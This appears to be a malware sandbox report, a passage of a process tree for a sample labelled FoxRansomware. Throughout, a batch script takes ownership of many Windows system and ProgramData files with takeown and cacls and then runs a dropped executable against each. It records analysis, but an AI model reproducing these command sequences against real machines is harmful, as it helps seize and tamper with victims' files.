C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner3⤵PID:6636
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:6548
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""2⤵PID:2636
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C3⤵PID:6988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"3⤵PID:5256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner3⤵PID:2724
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner4⤵
- Executes dropped EXE
PID:3956
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6644
-
-
-
[2] C:\Windows\SysWOW64\cmd.exe (PID 6464)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 6584)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 7568; Modifies file permissions)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 896)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftWordpad.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6808; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "MicrosoftWordpad.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7692; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 5800)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 6828)
      cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 6856; Suspicious use of AdjustPrivilegeToken)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 7468)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "device.png" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6784; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "device.png" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7556; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 6068)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 1388)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 8096; Suspicious use of AdjustPrivilegeToken)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 6572)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6528; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5624; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3660)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 7788)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 6768; Suspicious use of AdjustPrivilegeToken)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 6772)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "tasks.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 2392; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "tasks.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7464)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 7120)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.07e0391e-b16c-4bb2-b4c0-5395dd159cd1.1.etl""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 7648)
      cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.07e0391e-b16c-4bb2-b4c0-5395dd159cd1.1.etl" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 7644; Modifies file permissions)
      takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.07e0391e-b16c-4bb2-b4c0-5395dd159cd1.1.etl"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 7672)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "WuProvider.07e0391e-b16c-4bb2-b4c0-5395dd159cd1.1.etl" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7728)
        fjPLyeD8.exe -accepteula "WuProvider.07e0391e-b16c-4bb2-b4c0-5395dd159cd1.1.etl" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 3404; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 1740)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 1300)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 6164; Modifies file permissions)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 7932)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 8056; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7824; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 8032)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 7280)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\cmd.exe (PID 7860)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7580; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
  [3] C:\Windows\SysWOW64\takeown.exe (PID 8100; Suspicious use of AdjustPrivilegeToken)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7880; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 7924)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 7540)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 7812; Suspicious use of AdjustPrivilegeToken)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 7420)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7448; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 8112)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 7956)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  [3] C:\Windows\SysWOW64\cmd.exe (PID 5600)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6948; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7104; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner
  [3] C:\Windows\SysWOW64\takeown.exe (PID 8068; Suspicious use of AdjustPrivilegeToken)
      takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
  [3] C:\Windows\SysWOW64\cacls.exe (PID 7724)
      cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C

[2] C:\Windows\SysWOW64\cmd.exe (PID 7660)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  [3] C:\Windows\SysWOW64\takeown.exe (PID 5444; Modifies file permissions)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
  [3] C:\Windows\SysWOW64\cacls.exe (PID 8140)
      cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\cmd.exe (PID 5736)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "background.png" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7740; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 8084)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 6156)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 5984)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2196; Executes dropped EXE)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5712; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5820)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 7664)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 6020)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 5732)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 6192)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5784; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5096; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 7684)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4496)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 1548)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 5936)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "DesktopSettings2013.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5860; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 5036)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""
  [3] C:\Windows\SysWOW64\takeown.exe (PID 5776)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 4948; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3940)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
  [3] C:\Windows\SysWOW64\cacls.exe (PID 1468)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C

[2] C:\Windows\SysWOW64\cmd.exe (PID 1228)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4396)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 7232; Modifies file permissions)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3620)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6112; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6936; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 6824)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 5056)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\cmd.exe (PID 4524)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "VdiState.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 4856; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner
  [3] C:\Windows\SysWOW64\takeown.exe (PID 4884)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml"

[2] C:\Windows\SysWOW64\cmd.exe (PID 5484)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.1.etl""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 5416)
      cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.1.etl" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 6892)
      takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.1.etl"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 7208)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.1.etl" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6564; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 6348)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3448)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 2688)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 1120)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6364; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6368; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 5840)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 4732)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 6596)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 5236)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6560; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5280; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 6316)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""
  [3] C:\Windows\System32\Conhost.exe (PID 6076; Executes dropped EXE)
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  [3] C:\Windows\SysWOW64\cacls.exe (PID 6160)
      cacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 6248; Modifies file permissions)
      takeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 6272)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "AssemblyList_4_extended.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6304; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "AssemblyList_4_extended.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5308; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 5292)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 5256; Suspicious use of AdjustPrivilegeToken)
      cacls "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 6480; Modifies file permissions)
      takeown /F "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 6432)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "StorageHealthModel.dat" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5240; Executes dropped EXE)
        fjPLyeD8.exe -accepteula "StorageHealthModel.dat" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6608)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 6832)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 5196)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 6584)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 7568; Suspicious use of AdjustPrivilegeToken)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 1568)
        fjPLyeD8.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 2532)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 4492)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 5208)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 5708)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 6660)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5464)
        fjPLyeD8.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
